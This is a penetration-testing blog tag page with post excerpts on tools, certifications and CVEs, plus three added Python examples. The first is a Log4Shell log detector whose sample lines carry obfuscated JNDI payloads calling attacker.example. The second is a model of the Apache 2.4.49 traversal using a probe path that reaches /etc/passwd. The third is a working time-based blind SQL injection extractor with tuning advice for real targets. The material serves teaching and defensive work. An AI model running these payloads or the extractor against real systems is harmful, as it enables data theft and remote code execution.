Posts tagged with "penetration testing"
-
Using AuthMatrix to Find Access Control Issues
When testing a web app, an important area to focus on is access control. This can be tested using AuthMatrix, a Burp Suite extension that replays the same requests as multiple roles and compares the responses, which makes it useful for testing multi-role authorization. This post will demonstrate how to use AuthMatrix to test for an access control issue using the Damn Vulnerable Web Application (DVWA). The...
-
Identifying Web App Technologies Using Wappalyzer
Wappalyzer is a browser extension for identifying the technologies used by web apps. It is available for several browsers. For this demonstration, I will be running Wappalyzer as a Firefox extension. With Wappalyzer installed, open a web app in the browser. Next, click the Wappalyzer...
-
Certified Az Red Team Professional: A Review
Introduction I recently passed the Certified Az Red Team Professional (CARTP) exam after going through the course: Attacking and Defending Azure AD Cloud from Pentester Academy. This course is taken before the CARTP exam and helps with developing an Azure pentesting methodology. This post will cover my experience in completing...
-
Using Wireshark to Troubleshoot Exploits
Wireshark has many use cases beyond general network troubleshooting. One of them is troubleshooting exploits, which makes it a useful addition to a pentester's toolset. This post will demonstrate how to use Wireshark to troubleshoot a phpMyAdmin remote code execution exploit (CVE-2018-12613). Burp Suite can...
-
An Insight into the Certified Red Team Operator 2021 Course
Introduction I passed the Red Team Operator (RTO) exam after going through the updated RTO course and labs. The RTO course covers red team principles such as adversary simulation, command and control and OPSEC considerations, while also focusing on internal penetration testing such as Active Directory attacks. This post will...
-
A Summary of the Log4j RCE Vulnerability (CVE-2021-44228)
A zero-day remote code execution vulnerability (CVE-2021-44228), named ‘Log4Shell’, was found that affects Log4j 2 versions 2.0-beta9 through 2.14.1. Log4j is a logging library that is used in many Java applications; the bug is triggered when attacker-controlled text containing a JNDI lookup such as ${jndi:ldap://...} is logged. The vulnerability has been rated critical with a CVSS score of 10.0. The severity of this vulnerability is evident...
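Hunting for exploitation attempts in logs is the first thing most teams did after the disclosure. The detector below is an added example for this tag page (not code from the original post): it collapses the lookup nesting attackers used to hide the literal `${jndi:` string (`${lower:j}`, `${::-j}` and similar) and then flags any line carrying a JNDI lookup. The sample access-log lines and the host `attacker.example` are constructed for the demonstration.

```python
import re

# Innermost lookups first: the patterns exclude nested braces, so each
# substitution round resolves exactly one level of nesting.
_DEFAULT = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")         # ${x:-v} and ${::-v} -> v
_CASE = re.compile(r"\$\{(lower|upper):([^{}]*)\}", re.I)  # ${lower:J} -> j
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.I)               # the lookup that triggers the bug


def normalize(s, max_rounds=10):
    """Collapse Log4j lookup nesting used to disguise '${jndi:'."""
    for _ in range(max_rounds):
        new = _DEFAULT.sub(lambda m: m.group(1), s)
        new = _CASE.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower"
            else m.group(2).upper(),
            new,
        )
        if new == s:
            break
        s = new
    return s


def is_log4shell_probe(line):
    return _JNDI.search(normalize(line)) is not None


def scan(lines):
    """Return the indexes of lines that carry a JNDI lookup in any field."""
    return [i for i, line in enumerate(lines) if is_log4shell_probe(line)]


# Constructed sample access-log lines (not real traffic); attacker.example is a placeholder.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://attacker.example/a}"',
    '10.0.0.9 - - "GET /?x=${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/a} HTTP/1.1" 404 "-"',
]

if __name__ == "__main__":
    for i in scan(SAMPLE_LOG):
        print("suspicious:", SAMPLE_LOG[i])
```

Run it over a real access log one line at a time, or point it at any field the application logs verbatim (User-Agent, X-Forwarded-For, usernames); the normalisation step is what keeps a plain `grep jndi` from being bypassed.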
-
An Overview of the Apache Zero-Day Vulnerability (CVE-2021-41773)
Apache recently released patches for a zero-day vulnerability in its web server: CVE-2021-41773 affects version 2.4.49, and CVE-2021-42013 was assigned when the fix shipped in 2.4.50 turned out to be incomplete. Both Windows and Linux servers are affected. The zero-day vulnerability is a directory traversal that could allow an attacker to read files outside the document root and, where CGI scripts are enabled, to execute arbitrary code. Directory traversal (also known as...
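The root cause of this class of bug is ordering: a traversal check that runs on the still percent-encoded path, with decoding happening later in the filesystem mapping, never sees the `..` that `.%2e` becomes. The snippet below is an added, simplified model written for this page; it is not Apache's normalisation code and the document root `/var/www/html` is an assumption. The vulnerable resolver reproduces the ordering flaw against the `.%2e` form; the hardened one decodes first, refuses input that is still encoded after one pass (which also stops the double-encoded `.%%32%65` form that the 2.4.50 patch missed), and then confines the normalised result to the document root instead of trusting a segment check.

```python
import posixpath
from urllib.parse import unquote

DOCROOT = "/var/www/html"   # assumed document root for the demonstration


def vulnerable_resolve(raw_path):
    """Flawed ordering: traversal check on the encoded path, decode afterwards."""
    if ".." in raw_path.split("/"):
        return None                      # only a literal '..' segment is caught
    decoded = unquote(raw_path)          # '.%2e' turns into '..' here, after the check
    return posixpath.normpath(DOCROOT + decoded)


def hardened_resolve(raw_path):
    """Decode first, reject anything still encoded, then confine to DOCROOT."""
    decoded = unquote(raw_path)
    if "%" in decoded:                   # '.%%32%65' decodes to '.%2e': double encoding, reject
        return None
    target = posixpath.normpath(posixpath.join(DOCROOT, decoded.lstrip("/")))
    if target != DOCROOT and not target.startswith(DOCROOT + "/"):
        return None                      # normalised path escaped the document root
    return target


if __name__ == "__main__":
    probe = "/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd"
    print("vulnerable:", vulnerable_resolve(probe))
    print("hardened:  ", hardened_resolve(probe))
```

The containment check at the end is the part worth copying into your own code: once the final path is computed, compare it against the allowed root rather than trying to enumerate every encoding of a dot.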
-
Enumerating Internal Network Processes Using net-enum-listeners
One of the areas to focus on after getting an initial foothold on a machine is enumerating ports that are only accessible internally, such as services bound to localhost. Each listening port belongs to a process. Important processes to focus on are those that are running as SYSTEM or as a privileged user, which...
-
OSCP Exam Guide: Preparing and Passing
I recently wrote a guide on how to prepare and pass the Offensive Security Certified Professional (OSCP) exam. The guide includes tips for the following stages: pre-OSCP, PWK labs, post-labs and exam. The guide was published on Hack South and can be found at the below link: https://hacksouth.africa/community/oscp-guide/
-
OSCP Enumeration Cheat Sheet
I created an enumeration cheat sheet, which I recently uploaded to GitHub. I used this cheat sheet for conducting enumeration during my OSCP journey. Additionally, this cheat sheet contains commands and tools that I used while preparing for the OSCP using platforms like Vulnhub and Hack the Box. Some of...
-
Automating Time-Based Blind SQL Injection using Bash
This post introduces a bash script (time_blind_sqli.sh) that I wrote during my OSCP journey, which can be used to exploit time-based blind SQL injection in vulnerable parameters in GET or POST requests. While the use of SQLmap is permitted in the PWK labs, it is important to understand how...
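To make the mechanics concrete, here is an added example for this page (written in Python rather than bash, and not the author's script): it builds a MySQL-style `IF(...,SLEEP(),0)` probe, times each response, and recovers the result one character at a time with a binary search over the ASCII range, so each character costs seven requests instead of up to 127. The `send` callable is the only thing that touches the target; in a real run it would inject the payload into the chosen GET or POST parameter and time the HTTP response. `fake_send`, the `SECRET` value and the `users`/`password` query are constructed stand-ins so the example runs offline.

```python
import re
import time

# MySQL-flavoured probe: sleeps only when the character at `pos` is greater than `guess`.
TEMPLATE = ("' AND IF(ASCII(SUBSTRING(({query}),{pos},1))>{guess},"
            "SLEEP({delay}),0)-- -")


def extract(send, query, delay=0.02, max_len=32):
    """Recover the single-row result of `query` one character at a time.

    send(payload) must return the observed response time in seconds; a delayed
    response means the injected condition was true.
    """
    result = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127                  # binary search over the ASCII range
        while lo < hi:
            mid = (lo + hi) // 2
            payload = TEMPLATE.format(query=query, pos=pos, guess=mid, delay=delay)
            if send(payload) >= delay / 2:   # delayed => true => char code > mid
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:                      # SUBSTRING past the end gives '', ASCII('') = 0: done
            break
        result += chr(lo)
    return result


# ---- Constructed stand-in for the target (no real database or network) ----
SECRET = "s3cr3t"   # assumed value the simulated DB returns for the query
_PROBE = re.compile(r"\),(\d+),1\)\)>(\d+),SLEEP\(([\d.]+)\)")


def fake_send(payload):
    """Evaluate the injected IF(...) the way the DBMS would and report elapsed time."""
    m = _PROBE.search(payload)
    pos, guess, delay = int(m.group(1)), int(m.group(2)), float(m.group(3))
    code = ord(SECRET[pos - 1]) if pos <= len(SECRET) else 0
    start = time.perf_counter()
    if code > guess:
        time.sleep(delay)
    return time.perf_counter() - start


if __name__ == "__main__":
    print(extract(fake_send, "SELECT password FROM users LIMIT 1"))
```

Against a real target, use a delay of several seconds and a threshold well above the normal response jitter, and re-send any measurement that lands near the threshold; a single slow network round trip otherwise flips a bit and corrupts every character after it.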
-
Using Burp Proxy to Troubleshoot Web Exploits
When running web exploits against a target, there are times when the exploit fails and the terminal output does not give a descriptive error explaining why. The Burp Suite proxy can be used to troubleshoot why the exploit may not...